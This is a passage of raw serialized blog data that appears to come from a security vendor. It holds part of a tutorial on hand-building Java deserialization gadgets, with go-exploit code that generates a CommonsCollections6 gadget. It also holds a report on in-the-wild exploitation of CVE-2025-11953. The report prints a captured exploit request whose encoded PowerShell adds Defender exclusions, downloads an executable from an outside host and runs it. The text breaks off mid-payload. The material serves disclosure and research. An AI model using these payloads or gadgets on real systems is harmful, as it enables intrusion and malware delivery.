",[886,13914,13900],{},". This is denoted by the ",[886,13917,13918],{},"L"," value that prefaces both defined fields. With the ",[886,13921,13900],{},", we know we need to define the fieldName, followed by the className so let’s define the two fields.",[18,13924,13925,13926,13928,13929,13931,13932,13934,13935,13938,13939,13941,13942,13945,13946,13934,13949,13952],{},"Field1: ",[1823,13927],{},"\nfieldName: ",[886,13930,13918],{}," (object typecode) + ",[886,13933,13684],{}," (length of value) + ",[886,13936,13937],{},"key"," (value) ",[1823,13940],{},"\nclassName: ",[886,13943,13944],{},"0x74"," (states that this is a string) + ",[886,13947,13948],{},"0x0012",[886,13950,13951],{},"Ljava\u002Flang\u002FObject;"," (value)",[18,13954,13955,13956,13928,13958,13931,13960,13934,13962,13938,13965,13941,13967,13945,13969,13934,13972,13952],{},"Field2: ",[1823,13957],{},[886,13959,13918],{},[886,13961,13684],{},[886,13963,13964],{},"map",[1823,13966],{},[886,13968,13944],{},[886,13970,13971],{},"0x000f",[886,13973,13974],{},"Ljava\u002Futil\u002FMap;",[18,13976,13977,13978,13980],{},"Following this, you would move onto ",[886,13979,13713],{}," and so on just like the previous object.",[993,13982,13984],{"id":13983},"primitive-fields","Primitive Fields",[18,13986,13987,13988,13990,13991,13993],{},"But what if a field value were a ",[886,13989,13896],{}," instead of an ",[886,13992,13900],{},"?",[1354,13995,13998],{"className":13996,"code":13997,"language":1359,"meta":219},[1357],"primitiveDesc:\n prim_typecode fieldName\n\nprim_typecode:\n `B' \u002F\u002F byte\n `C' \u002F\u002F char\n `D' \u002F\u002F double\n `F' \u002F\u002F float\n `I' \u002F\u002F integer\n `J' \u002F\u002F long\n `S' \u002F\u002F short\n `Z' \u002F\u002F boolean\n\nobj_typecode:\n `[` \u002F\u002F array\n `L' \u002F\u002F object\n",[886,13999,13997],{"__ignoreMap":219},[18,14001,14002],{},"At this point I am going to break away from the object we were defining before and use some other portions of the dump as examples. Remember that we cannot build the entire gadget in this blog as it is simply too large. Instead the goal is to explain how to read and understand the spec while explaining the trickier parts and offering some examples of how to “codify” some parts of the spec.",[18,14004,14005,14006,14008,14009,13555],{},"That said, if we go further down in the dump, we see a record whose ",[886,14007,13580],{}," includes two fields, both of which are ",[886,14010,13896],{},[1354,14012,14015],{"className":14013,"code":14014,"language":1359,"meta":219},[1357],"...\n@FieldCount - 2 - 0x00 02\n[]Fields\n Index 0:\n Float - F - 0x46\n @FieldName\n @Length - 10 - 0x00 0a\n @Value - loadFactor - 0x6c 6f 61 64 46 61 63 74 6f 72\n Index 1:\n Integer - I - 0x49\n @FieldName\n @Length - 9 - 0x00 09\n @Value - threshold - 0x74 68 72 65 73 68 6f 6c 64\n...\n",[886,14016,14014],{"__ignoreMap":219},[18,14018,14019,14020,14023,14024,14027,14028,14031],{},"So starting from just after the ",[886,14021,14022],{},"fieldCount",", we can see the first field being prefaced with an ",[886,14025,14026],{},"F",". We know from the spec referenced above that it is the ",[886,14029,14030],{},"prim_typecode"," that denotes a float.",[18,14033,14034,14035,14038,14039,14041,14042,14045,14046,14048],{},"Now with fields, remember we are just defining the “metadata” for them, such as the name and type, not the actual values (yet). So here we are saying this is a float, called ",[886,14036,14037],{},"loadFactor",". This is represented as yet another length-prefixed string, so the entire first field above is just ",[886,14040,14026],{}," (prim_typecode), ",[886,14043,14044],{},"0x000a"," (value length), and ",[886,14047,14037],{}," (value).",[18,14050,14051,14052,14054,14057,14058,14061,14062,14048],{},"The same idea is followed for the second field. ",[1823,14053],{},[886,14055,14056],{},"I"," (primitive typecode for Integer) + ",[886,14059,14060],{},"0x0009"," (value length) + ",[886,14063,14064],{},"threshold",[18,14066,14067,14068,14071],{},"That’s pretty much it for primitive fields. If you want to see where the actual numerical values are located for these, just look a little further in the dump at the ",[886,14069,14070],{},"classData"," section:",[1354,14073,14076],{"className":14074,"code":14075,"language":1359,"meta":219},[1357],"...\n[]ClassData\n @ClassName - java.util.HashMap\n {}Attributes\n loadFactor\n (float)0.75 - 0x3f 40 00 00\n threshold\n (integer)0 - 0x00 00 00 00\n...\n",[886,14077,14075],{"__ignoreMap":219},[18,14079,14080,14081,14083,14084,14087,14088,14090,14091,14094,14095,14098,14099,14102],{},"In the ",[886,14082,14070],{},", under attributes, you can see the actual data for the primitive values whose positions correspond to the position of their respective “keys” in the ",[886,14085,14086],{},"Fields"," section. The ",[886,14089,14037],{}," (float) is ",[886,14092,14093],{},"0.75,","represented in hexadecimal as ",[886,14096,14097],{},"0x3f400000",", and the integer is a four-byte hexadecimal ",[886,14100,14101],{},"0x00000000"," which is obviously just zero.",[993,14104,14106],{"id":14105},"array-fields","Array Fields",[18,14108,14109,14110,14112,14113,14115,14116,14118,14119,59],{},"Another field type that is a little bit different is the array field. For the field section, it operates the same as all of the ",[886,14111,13900],{}," fields: some sort of ",[886,14114,14030],{},", in this case a single opening bracket ",[886,14117,7035],{}," representing an array, followed by a FieldName and a ClassName, both of which are len-prefixed string values with the ClassName being a separate record with its own constant, ",[886,14120,13944],{},[18,14122,14123,14124,4606],{},"Just to show an example of this using the zkar dump, here is the Fields section for ",[886,14125,14126],{},"ChainedTransformer",[1354,14128,14131],{"className":14129,"code":14130,"language":1359,"meta":219},[1357],"@FieldCount - 1 - 0x00 01\n[]Fields\n Index 0:\n Array - [ - 0x5b\n @FieldName\n @Length - 13 - 0x00 0d\n @Value - iTransformers - 0x69 54 72 61 6e 73 66 6f 72 6d 65 72 73\n @ClassName\n TC_STRING - 0x74\n @Handler - 8257547\n @Length - 45 - 0x00 2d\n @Value - [Lorg\u002Fapache\u002Fcommons\u002Fcollections\u002FTransformer; - 0x5b 4c 6f 72 67 2f 61 70 61 63 68 65 2f 63 6f 6d 6d 6f 6e 73 2f 63 6f 6c 6c 65 63 74 69 6f 6e 73 2f 54 72 61 6e 73 66 6f 72 6d 65 72 3b\n",[886,14132,14130],{"__ignoreMap":219},[18,14134,14135,14136,14139],{},"The array values, as with other fields, can be found by looking at the defining class’s ",[886,14137,14138],{},"[]ClassData"," attribute that corresponds to the field’s position.",[18,14141,14142,14143,4606],{},"The spec for arrays is listed in the spec as ",[886,14144,14145],{},"newArray",[1354,14147,14150],{"className":14148,"code":14149,"language":1359,"meta":219},[1357],"newArray:\n TC_ARRAY classDesc newHandle (int)\u003Csize> values[size]\n",[886,14151,14149],{"__ignoreMap":219},[18,14153,14154,14155,14157,14158,14161],{},"This will be a single byte, then the ",[886,14156,13547],{}," —the handle is implied, so it does not need to be added by us — then a four-byte integer representing the number of values in the array, finally followed by the array values themselves. We saw the Fields section for ",[886,14159,14160],{},"ChainedTransformer,"," so now let’s look at the actual array object to which the field referred below. Some information has been omitted for brevity and clarity.",[1354,14163,14166],{"className":14164,"code":14165,"language":1359,"meta":219},[1357],",..\n[]ClassData\n @ClassName - org.apache.commons.collections.functors.ChainedTransformer\n {}Attributes\n iTransformers\n TC_ARRAY - 0x75\n TC_CLASSDESC - 0x72\n @ClassName\n @Length - 45 - 0x00 2d\n @Value - [Lorg.apache.commons.collections.Transformer; - 0x5b 4c 6f 72 67 2e 61 70 61 63 68 65 2e 63 6f 6d 6d 6f 6e 73 2e 63 6f 6c 6c 65 63 74 69 6f 6e 73 2e 54 72 61 6e 73 66 6f 72 6d 65 72 3b\n @SerialVersionUID - -4803604734341277543 - 0xbd 56 2a f1 d8 34 18 99\n @Handler - 8257549\n @ClassDescFlags - SC_SERIALIZABLE - 0x02\n @FieldCount - 0 - 0x00 00\n []Fields\n []ClassAnnotations\n TC_ENDBLOCKDATA - 0x78\n @SuperClassDesc\n TC_NULL - 0x70\n @Handler - 8257550\n @ArraySize - 5 - 0x00 00 00 05\n []Values\n Index 0\n TC_OBJECT - 0x73\n TC_CLASSDESC - 0x72\n --- OMITTED FOR BREVITY ---\n @Handler - 8257552\n []ClassData\n @ClassName - org.apache.commons.collections.functors.ConstantTransformer\n {}Attributes\n iConstant\n TC_CLASS - 0x76\n TC_CLASSDESC - 0x72\n --- OMITTED FOR BREVITY ---\n @Handler - 8257554\n Index 1\n ...\n",[886,14167,14165],{"__ignoreMap":219},[18,14169,14170,14171,13555],{},"We will only briefly go over the first item in the array mentioned in the field since this particular array is quite large; all five items are ",[886,14172,13516],{},[18,14174,14175,14176,14179,14180,14183,14184,14186],{},"From the top the ",[886,14177,14178],{},"TC_ARRAY","-identifying byte can be seen, represented as ",[886,14181,14182],{},"0x75",". Next, per the specification, is the ",[886,14185,13580],{},", which we have already gone over earlier in this blog.",[18,14188,14189,14190,14193,14194,14196,14197,14199,14200,14202],{},"Following the class description is the size of the array, represented here as ",[886,14191,14192],{},"0x00000005",". ",[1823,14195],{},"\nAfter this are the values. In the dump above, the first item is shown, which is yet another ",[886,14198,13516],{}," (more nesting!). You can view the full zkar dump for the complete list of array items but this shows the structure of how the array field is laid out. Keep in mind that any of these ",[886,14201,13516],{},"s may contain fields with arrays that yet contain more arrays that contain more objects, and so on.",[993,14204,14206],{"id":14205},"tc_reference-records","TC_REFERENCE Records",[18,14208,14209,14210,14212,14213,4606],{},"The last record we will cover is the ",[886,14211,13645],{},". In the spec it is called ",[886,14214,14215],{},"prevObject",[1354,14217,14220],{"className":14218,"code":14219,"language":1359,"meta":219},[1357],"prevObject\n TC_REFERENCE (int)handle\n",[886,14221,14219],{"__ignoreMap":219},[18,14223,14224,14225,14227],{},"The name ",[886,14226,14215],{}," makes sense, because as stated earlier in this blog post, it serves to reference another record that has been previously defined in the stream rather than redefining the entire record all over again (which would waste space).",[18,14229,14230],{},"Let’s look at quick example using an excerpt from the dump:",[1354,14232,14235],{"className":14233,"code":14234,"language":1359,"meta":219},[1357],"[]Fields\n Index 0:\n Object - L - 0x4c\n @FieldName\n @Length - 9 - 0x00 09\n @Value - iConstant - 0x69 43 6f 6e 73 74 61 6e 74\n @ClassName\n TC_REFERENCE - 0x71\n @Handler - 8257539 - 0x00 7e 00 03\n",[886,14236,14234],{"__ignoreMap":219},[18,14238,14239,14240,14243],{},"This is referencing another ",[886,14241,14242],{},"TC_STRING"," that was defined earlier in the stream:",[1354,14245,14248],{"className":14246,"code":14247,"language":1359,"meta":219},[1357],"[]Fields\n Index 0:\n Object - L - 0x4c\n @FieldName\n @Length - 3 - 0x00 03\n @Value - key - 0x6b 65 79\n @ClassName\n TC_STRING - 0x74\n @Handler - 8257539\n @Length - 18 - 0x00 12\n @Value - Ljava\u002Flang\u002FObject; - 0x4c 6a 61 76 61 2f 6c 61 6e 67 2f 4f 62 6a 65 63 74 3b\n",[886,14249,14247],{"__ignoreMap":219},[18,14251,14252,14253,14255],{},"Defining the ",[886,14254,13645],{}," is pretty straightforward:",[18,14257,14258,14259,14262],{},"The code (",[886,14260,14261],{},"0x71",") + the four byte hexadecimal for the “handler” of the referenced object.",[18,14264,14265],{},"See, simple!",[993,14267,1903],{"id":1902},[18,14269,14270,14271,59],{},"That about sums up the major points of the specification. For a full breakdown of the gadget and the code we wrote to generate it see the ",[47,14272,14275],{"href":14273,"rel":14274},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002Feba8be1bfcd93c203cf8efd00a60e9c086d261f1\u002Fjava\u002Fgadgets.go#L286",[51],"full golang package on our github",[61,14277,14279],{"id":14278},"using-the-library","Using The Library",[18,14281,14282],{},"Just like the .NET gadget library, we tried to make VulnCheck’s Java serialization library as easy as possible to use.",[18,14284,14285],{},"Generating a gadget in Go using the library works as follows:",[1354,14287,14290],{"className":14288,"code":14289,"language":1359,"meta":219},[1357],"import (\n \"os\"\n\n \"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fjava\"\n)\nfunc main() {\n gadgetData, ok := java.CreateCommonsCollections6(\"cmd.exe\", \"\u002Fc calc\")\n if !ok {\n \u002F\u002F failure!\n }\n \u002F\u002F do something with gadgetData\n}\n",[886,14291,14289],{"__ignoreMap":219},[18,14293,14294,14295,59],{},"If you wish to contribute or report bugs for this platform please feel free to make a pull request or issue on the ",[47,14296,14299],{"href":14297,"rel":14298},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit",[51],"go-exploit GitHub project",[61,14301,202],{"id":201},[18,14303,14304,14305,10515,14311,1255,14316,14321,14322,1234,14325,1240,14328,1246,14331,1255,14334,1260],{},"The VulnCheck research team is always looking for new vulnerabilities and exploits to curate. For more research like this, read our blogs ",[1131,14306,14307],{},[47,14308,14310],{"href":13214,"rel":14309},[51],"Making Serialization Gadgets By Hand - .NET,",[1131,14312,14313],{},[47,14314,10339],{"href":10337,"rel":14315},[51],[1131,14317,14318],{},[47,14319,11601],{"href":11599,"rel":14320},[51]," Sign up for the VulnCheck community today to get free access to our ",[47,14323,1233],{"href":10806,"rel":14324},[51],[47,14326,1239],{"href":1237,"rel":14327},[51],[47,14329,1245],{"href":1243,"rel":14330},[51],[47,14332,1251],{"href":1249,"rel":14333},[51],[47,14335,216],{"href":1258,"rel":14336},[51],{"title":219,"searchDepth":220,"depth":220,"links":14338},[14339,14340,14343,14344,14349,14355,14356],{"id":13191,"depth":220,"text":13194},{"id":13205,"depth":220,"text":13208,"children":14341},[14342],{"id":13227,"depth":1266,"text":13230},{"id":13292,"depth":220,"text":13293},{"id":13306,"depth":220,"text":14345,"children":14346},"You can view the full library with all relevant records implemented in VulnCheck’s go-exploit framework here: Github Getting Started",[14347,14348],{"id":13356,"depth":1266,"text":13357},{"id":13506,"depth":1266,"text":13507},{"id":13554,"depth":220,"text":13778,"children":14350},[14351,14352,14353,14354],{"id":13983,"depth":1266,"text":13984},{"id":14105,"depth":1266,"text":14106},{"id":14205,"depth":1266,"text":14206},{"id":1902,"depth":1266,"text":1903},{"id":14278,"depth":220,"text":14279},{"id":201,"depth":220,"text":202},"2026-02-05","Learn how to start creating Java serialization gadgets yourself - or use VulnCheck's go-exploit library for Golang-based exploits!",{"slug":14360},"making-java-gadgets","\u002Fblog\u002Fmaking-java-gadgets",{"title":13180,"description":14358},"blog\u002Fmaking-java-gadgets",[1281,14365,14366],"serialization","development","Z9I1R1VBr6xd9cqmAsO0fC7kXtAyNligw85lVFauHJk",{"id":14369,"title":11601,"articles":14370,"authors":14413,"body":14415,"date":14375,"description":14765,"extension":234,"image":7,"link":7,"meta":14766,"navigation":237,"path":14768,"seo":14769,"series":7,"stem":14770,"subtype":7,"tags":14771,"__hash__":14772},"blog\u002Fblog\u002Fmetro4shell_eitw.md",[14371,14376,14380,14384,14388,14392,14395,14399,14402,14405,14409],{"title":14372,"source":14373,"link":14374,"date":14375},"Hackers exploit critical React Native Metro bug to breach dev systems","Bleeping Computer","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-exploit-critical-react-native-metro-bug-to-breach-dev-systems\u002F","2026-02-03",{"title":14377,"source":14378,"link":14379,"date":14375},"Malware & ThreatsCritical React Native Vulnerability Exploited in the Wild","SecurityWeek","https:\u002F\u002Fwww.securityweek.com\u002Fcritical-react-native-vulnerability-exploited-in-the-wild\u002F",{"title":14381,"source":14382,"link":14383,"date":14375},"Hackers Exploit Metro4Shell RCE Flaw in React Native CLI npm Package","The Hacker News","https:\u002F\u002Fthehackernews.com\u002F2026\u002F02\u002Fhackers-exploit-metro4shell-rce-flaw-in.html",{"title":14385,"source":14386,"link":14387,"date":14375},"Hackers Exploiting React Native’s Metro Server in the Wild to Attack Developers","Cyber Security News","https:\u002F\u002Fcybersecuritynews.com\u002Freact-native-metro-server-exploit\u002F",{"title":14389,"source":14390,"link":14391,"date":14375},"Hackers abused React Native CLI flaw to deploy Rust malware before public disclosure","Security Affairs","https:\u002F\u002Fsecurityaffairs.com\u002F187587\u002Fhacking\u002Fhackers-abused-react-native-cli-flaw-to-deploy-rust-malware-before-public-disclosure.html",{"title":14393,"source":3481,"link":14394,"date":14375},"Critical React Native Metro dev server bug under attack as researchers scream into the void","https:\u002F\u002Fwww.theregister.com\u002F2026\u002F02\u002F03\u002Fcritical_react_native_metro_server\u002F",{"title":14396,"source":12157,"link":14397,"date":14398},"Risky Bulletin: Plone CMS stops supply-chain attack","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-plone-cms-stops-supply-chain-attack\u002F","2026-02-04",{"title":14400,"source":12153,"link":14401,"date":14398},"Attacks involving critical React Native bug target Windows, Linux systems","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fattacks-involving-critical-react-native-bug-target-windows-linux-systems",{"title":14403,"source":10841,"link":14404,"date":14398},"React2Shell exploitation undergoes significant change in threat activity","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Freact2shell-exploitation-threat-activity\u002F811359\u002F",{"title":14406,"source":14407,"link":14408,"date":14398},"Hackers Actively Exploit React Native Metro Server to Target Software Developers","GB Hackers","https:\u002F\u002Fgbhackers.com\u002Fhackers-actively-exploit-react-native-metro-server\u002F#google_vignette",{"title":14410,"source":14411,"link":14412,"date":14357},"React Native ‘Metro4Shell’ Exploited in the Wild, Putting Exposed Development Servers at Risk","The Cyber Syrup","https:\u002F\u002Fwww.thecybersyrup.com\u002Fp\u002Freact-native-metro4shell-exploited-in-the-wild-putting-exposed-development-servers-at-risk",[14414],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":14416,"toc":14757},[14417,14420,14426,14444,14468,14471,14477,14484,14495,14501,14504,14511,14517,14520,14541,14544,14550,14553,14568,14571,14577,14580,14583,14589,14592,14595,14598,14602,14609,14660,14666,14709,14711,14737],[263,14418],{":list":14419,"ico":266,"title":20},"[\"VulnCheck Canaries observed exploitation of CVE-2025-11953 in late December.\",\"Canary telemetry shows CVE-2025-11953 being used operationally, with consistent payload delivery across multiple dates rather than one-off probing or research activity.\",\"Exploitation delivered advanced payloads on Windows systems, demonstrating that Metro4Shell provides a practical initial access mechanism when exposed to the public internet.\"]",[18,14421,14422],{},[68,14423],{"alt":14424,"src":14425},"Metro Development Server Timeline","\u002Fblog\u002Fmetro4shell_eitw\u002Fcve-2025-11953-timeline.png",[18,14427,14428,14429,14434,14435,14439,14440,14443],{},"VulnCheck observed exploitation of ",[47,14430,14433],{"href":14431,"rel":14432},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-11953",[51],"CVE-2025-11953"," on December 21, 2025, when our ",[47,14436,14438],{"href":920,"rel":14437},[51],"Canary"," network recorded exploitation of a Metro Development Server. The vulnerability, which we jokingly refer to as Metro4Shell, was automatically added to ",[47,14441,1233],{"href":10806,"rel":14442},[51]," the same day. Additional exploitation observed in January delivered the same payloads on January 4, 2026 and January 21, 2026, indicating continued operational use.",[18,14445,14446,14447,14452,14453,10515,14458,10515,14462,14467],{},"Now, more than a month after initial exploitation in the wild, that activity has yet to see broad public acknowledgment, and EPSS continues to assign a low exploitation probability of ",[47,14448,14451],{"href":14449,"rel":14450},"https:\u002F\u002Fapi.first.org\u002Fdata\u002Fv1\u002Fepss?cve=CVE-2025-11953&date=2026-01-28",[51],"0.00405",". This gap between observed exploitation and wider recognition matters, particularly for vulnerabilities that are easy to exploit and, as internet-wide ",[47,14454,14457],{"href":14455,"rel":14456},"https:\u002F\u002Fplatform.censys.io\u002Fsearch?q=host.services.endpoints.http.html_title%3D%22React+Native%22+and+host.services.port%3D%228081%22%20",[51],"search",[47,14459,9156],{"href":14460,"rel":14461},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=dGl0bGU9IlJlYWN0IE5hdGl2ZSIgJiYgcG9ydD04MDgx",[51],[47,14463,14466],{"href":14464,"rel":14465},"https:\u002F\u002Fwww.zoomeye.ai\u002FsearchResult?q=KHRpdGxlPSJSZWFjdCBOYXRpdmUiICYmIHBvcnQ9IjgwODEiKQ%3D%3D",[51],"shows",", exposed on the public internet.",[18,14469,14470],{},"VulnCheck customers had visibility into exploitation of this vulnerability in November through exploits and Suricata rules developed by the VulnCheck Initial Access Intelligence team. That early visibility ultimately informed and powered the detection logic deployed across the VulnCheck Canary network.",[993,14472,14474],{"id":14473},"all-aboard-the-metro-server",[295,14475,14476],{},"All Aboard the Metro Server",[18,14478,14479,14480,14483],{},"Metro is the JavaScript bundler and development server used by React Native applications during development and testing. Under default conditions, Metro can bind to external interfaces and expose an ",[886,14481,14482],{},"\u002Fopen-url"," endpoint. On Windows, the endpoint allows unauthenticated and remote attackers to execute arbitrary OS commands via a simple POST request.",[18,14485,14486,14487,14491,14492,59],{},"The vulnerability was found by JFrog researchers who published a root cause analysis on their ",[47,14488,11046],{"href":14489,"rel":14490},"https:\u002F\u002Fjfrog.com\u002Fblog\u002Fcve-2025-11953-critical-react-native-community-cli-vulnerability\u002F",[51],". This was followed by multiple proof of concept exploits on ",[47,14493,2485],{"href":11516,"rel":14494},[51],[993,14496,14498],{"id":14497},"train-spotting",[295,14499,14500],{},"Train-Spotting",[18,14502,14503],{},"The exploitation observed by VulnCheck was neither experimental nor exploratory. The payloads delivered through the Canary network were consistent across multiple weeks of exploitation, indicating operational use rather than vulnerability probing or proof-of-concept testing.",[18,14505,14506,14507,14510],{},"The attackers employed a multi-stage PowerShell-based loader delivered through ",[886,14508,14509],{},"cmd.exe",". The initial PowerShell is base64 encoded. An example of the observed attack pattern follows:",[1354,14512,14515],{"className":14513,"code":14514,"language":1359},[1357],"POST \u002Fopen-url HTTP\u002F1.1\nHost: VC_REDACTED\nUser-Agent: curl\u002F7.85.0\nContent-type: application\u002Fjson\nContent-Length: 4632\nConnection: Close\n\n{\"url\":\"cmd \u002Fc powershell -EncodedCommand JABjAHUAcgByAGUAbgB0AEQAaQByAGUAYwB0AG8AcgB5ACAAPQAgACQAKABHAGUAdAAtAEwAbwBjAGEAdABpAG8AbgApAC4AUABhAHQAaAA7AAoAJABzAHkAcwB0AGUAbQBUAGUAbQBwAEQAaQByAGUAYwB0AG8AcgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFQAZQBtAHAAUABhAHQAaAAoACkAOwAKAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAYwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAgADIAPgAgACQAbgB1AGwAbAA7AAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAcwB5AHMAdABlAG0AVABlAG0AcABEAGkAcgBlAGMAdABvAHIAeQAgADIAPgAgACQAbgB1AGwAbAA7AAoACgAkAHQAYwBwAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAYwBwAEMAbABpAGUAbgB0ADsACgAkAHQAYwBwAEMAbABpAGUAbgB0AC4AQwBvAG4AbgBlAGMAdAAoACIAOAAuADIAMQA4AC4ANAAzAC4AMgA0ADgAIgAsADYAMAAxADIANAApADsACgAkAHQAYwBwAFMAdAByAGUAYQBtACAAPQAgACQAdABjAHAAQwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAKACQAcgBlAHEAIAA9ACAAIgBHAEUAVAAgAC8AdwBpAG4AZABvAHcAcwAiADsACgAkAHIAZQBxAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcgBlAHEAKQA7AAoAJAB0AGMAcABTAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcgBlAHEAYgAsADAALAAkAHIAZQBxAGIALgBMAGUAbgBnAHQAaAApADsACgAKACQAZQB4AGUAYwBwACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABzAHkAcwB0AGUAbQBUAGUAbQBwAEQAaQByAGUAYwB0AG8AcgB5ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgAGoAegBEAGoAaQBxAEsAVQAuAGUAeABlADsACgAkAGYAaQBsAGUAUwB0AHIAZQBhAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBXAHIAaQB0AGUAKAAkAGUAeABlAGMAcAApADsACgAKACQAYgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAANAAwADkANgA7AAoAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAwADsACgB3AGgAaQBsAGUAIAAoACgAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHQAYwBwAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApACkAIAAtAGcAdAAgADAAKQAgAHsACgAgACAAIAAgACQAZgBpAGwAZQBTAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7AAoAfQAKACQAZgBpAGwAZQBTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAKACQAdABjAHAAUwB0AHIAZQBhAG0ALgBDAGwAbwBzAGUAKAApADsACgAkAHQAYwBwAEMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgAkAGUAeABlAGMAcAAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACcAMwBxAGgAQQBJAG0AYQBMAGoANwA0AHoASABkAHkAeQBHAEQAUQBGAHMATgBzAGYATABMAHUARgBoAFcATQBoAFgANwBDAHIAcwBiAGwAQgBJADMAbQBYAGoAcgBrAG4ARwA5AHkAOABBAHoAVQBXAHUAOQB3AGUATQA3AHEATgBpADIAWQBzAFgANwBtAG4AcQBMAEoASABKAEcAYQBXAGoANgBzAHMASAA5AHEAawBCAHoAYwBDAHAATgBnAGQATQA3AG0ATABuADIARQBrAFEATAB5AHAAdgA3AHgARwBPAG0AVwBSAGoANgBVAHMARwBOAHEAawBCAHoATQBIAHMATgBzAGYATABMAHUASgBoAFcAOAA2AFEANwBtAG4AcwBiAHgAQwBPAG0AVwBSAGgATABFAHIASAA5AHkANABBAGkAQQBFAHUATgA4AEIASgBiAE8AUwBsAEcARQBuAFgANwBtAG0AcAA3AEoASABKAEcAYQBYAGoASwBzAHMASAA5AHUAawBCAHoASQBZAHUAOQBzAGUATQA3AHEASwBuAEcAMABpAFEATAAyAG0AdgA3AEIARgBPAG0AUwBUAGsAcgBvAHYASAA4AE8AKwBCAFQAbwBBAHYAOQBrAGUAUABiAGkASwBpADIAWQBuAFIAcQBhAHUAcQA3AGwAZgBKAG0AYQBYAGgAcgAwAGwASAB0AHUAcQBBAEQAQQBZAHUAOQBvAGYATQA3AG0ASgBsAG4AawBqAFIAcgBLAHAAcgA3AGwARABKAEgAZQBSAGkANgBVAHYASABOAHEAawBCAHoAUQBHAHAATgB3AGQASgA3ADIATQBsAEcATQBoAFUAYgBtAHUAcgBLAFoAQQBKAEcASwBMAGoAYgBzAG8AQQBkAHkAOQBEAHoAbwBQAHUATgBRAFcAUABiAHEATgBsADMAawBsAFEANwB5AHgAcgBMAHQAZgBMAEcAQwBmAGkAcgBzAHMARwA5AHEAcQBEAGkANABFAHUAOQBVAEIATAA3AGkASQBpADIASQBrAFMANwA2AHYAcgByAHQAQgBOAEcAVwBVAGoAcQBVAGsASABjAE8ANwBCAGoARQBZAHMAdABvAFYASwA3AHUATgBsAFcAOAAwAFEANwBxAHQAcwBiAGwAQQBMAEgAbQBVAGoAYgBrAHoASAB0AHEAeQBEAEQAZwBCAHYATgB3AFAATAA3AG0AUABpADIARQA2AFEANwB5AG0AcwBiAGwARgBKAFcAMgBUAGkAYgBvAG8ARAA5ACsANABCAEMANABPAHMAcwBNAGUASwA3AGkAUwBsAEcANABzAFMANwA2AHYAcgByAHAAQgBOAEcAKwBMAGoAYgA4AHQAQQBkACsANgBCAEMANABBAHYAdABjAFoATABMAG0AUABoAFcATQBqAFgANwBxAHIAcgBhAFoAQQBKAEcAKwBMAGkANwBvAG4ARwBkADIANwBCAGoAYwBXAHYAdABvAEIATAA3ACsAUABpADIAWQBqAFIAcQBhAHUAcgBMAGwATABJAG0AZQBVAGoATAA0ADkASAB0AG0AawBCAHoAQQBGAHAATgB3AFoASwBLAFcATgBsAG0AQQB1AFIAcgBpAHEAcgBhAGgASgBPAG0AVwBVAGkANgBVAHMARgB0AFcAawBCAEQARQBDAHMATgBzAGYATABMAHEATgBoAFcAOAA2AFEANwBtAG4AcwBiAHAARABJAFgAbQBSAGoAcgBFAHIASAA5AHkANgBCAHkAQQBDAHYAYwBNAGQASwBiAG0AUwBrAEcAOAA2AFMAYgB5AGwAcQBiAGgAQQBKAEcANgBGAGkATAB3AHoASABkAG0ANQBHAEQARQBFAHYAYwBNAGUASwBiAHUARwBrADIAYwBsAFIAYgB1AC8AcgByAGgARwBPAG0AYQBTAGkASwBVAG8ASABjAE8ANABBAFQAbwBBAHUAdAB3AGIASwA2AHUATgBsAEcAWQA2AFEATABtAHgAcgByAEIAZgBKAFcAKwBTAGgAcgAwAHQASAB0ADYANQBGAGoAUQBCAHAATgA4AGMASgBhAFcATwBsADIATQA2AFEAcgBtAGwAcQBiAGgAQQBKADIANgBpAEsAMABnAEQAQgBNAHAASABlAG8AdwBKAE8AMABxA